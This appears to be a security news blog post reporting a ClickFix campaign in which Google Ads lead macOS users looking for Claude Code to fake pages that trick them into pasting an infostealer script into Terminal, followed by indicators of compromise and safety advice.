ClickFix Campaign via Google Ads How Hackers Exploit Claude to Target macOS

Illustration of macOS cyber attack through fake Claude advertisements
Pavlo Zaslonov 14 May 2026
SecurityAIInternet & Networks
28 0
Table of Contents

New Wave of Attacks on Apple Users

Cybercriminals have begun leveraging the popularity of AI tools from Anthropic to distribute malware. This time, the targets are developers and technical professionals seeking Claude Code – a command-line interface for interacting with AI. Attackers rent advertising space in Google Ads to push their phishing resources to the top of search results.

The Mechanics of a ClickFix Attack

The ClickFix method is not new, but its adaptation for the macOS ecosystem is becoming increasingly sophisticated. A user trying to download Claude Code ends up on a site that mimics a content display error or an installer failure. To ‘solve’ the issue, the resource suggests copying a specific script and pasting it directly into the macOS Terminal. This is a critical point of compromise, as executing third-party code in the console gives hackers full system access without the need to download traditional .dmg or .pkg files.

How the Malicious Script Operates

The command the user copies usually looks like a legitimate repository request or a system utility. Once launched, it performs the following actions:

  • Establishes a connection with a remote command and control (C2) server.
  • Scans the Keychain for saved passwords.
  • Steals session tokens from popular browsers (Chrome, Safari, Firefox).
  • Collects system logs and hardware data.
Comparison of Legitimate Tool vs Fake
Parameter Original Claude Code Malicious Version (ClickFix)
Download Source Official NPM repository Google Ads sponsored links
Installation Method Command: npm install -g @anthropic-ai/claude-code Complex scripts with Base64 encoding
Permission Requirements Standard user permissions Requests for sudo or Keychain access
Outcome Functional AI assistant Data leak and backdoor installation

The MacSync Infostealer and Its Capabilities

Security researchers have discovered that the primary goal of the current campaign is to distribute a stealer called MacSync. This specialized macOS software targets crypto wallets, corporate service passwords, and two-factor authentication data. By using Google Ads as a delivery vector, hackers bypass standard spam filters and gain the trust of users who are accustomed to trusting top search results.

Technical Indicators of Compromise

If you have accidentally executed a suspicious command in the terminal, look for the following signs:

  • Appearance of unknown processes in Activity Monitor consuming network traffic.
  • Access requests to sensitive folders (Documents, Desktop) from unknown utilities.
  • Changes in DNS settings or installation of new configuration profiles in system settings.

Security Recommendations

To minimize risks, experts advise ignoring ad blocks in search engines when downloading professional software. Always verify the site URL (it must belong to anthropic.com) and use package managers only with official documentation. If infection is suspected, immediately change all passwords stored in the browser and Keychain, and reset active sessions on critical resources.

Source: Malwarebytes Labs

#Claude AI #Cybersecurity #Google Ads #infostealer #macOS #malware
Pavlo Zaslonov
About The Author

Pavlo Zaslonov

Cybersecurity expert, knows everything about IP hiding and modern chatbot vulnerabilities.

View all posts

Relevant Posts

0 Comments

Leave a Reply

2500
Please enter a comment
Please enter your name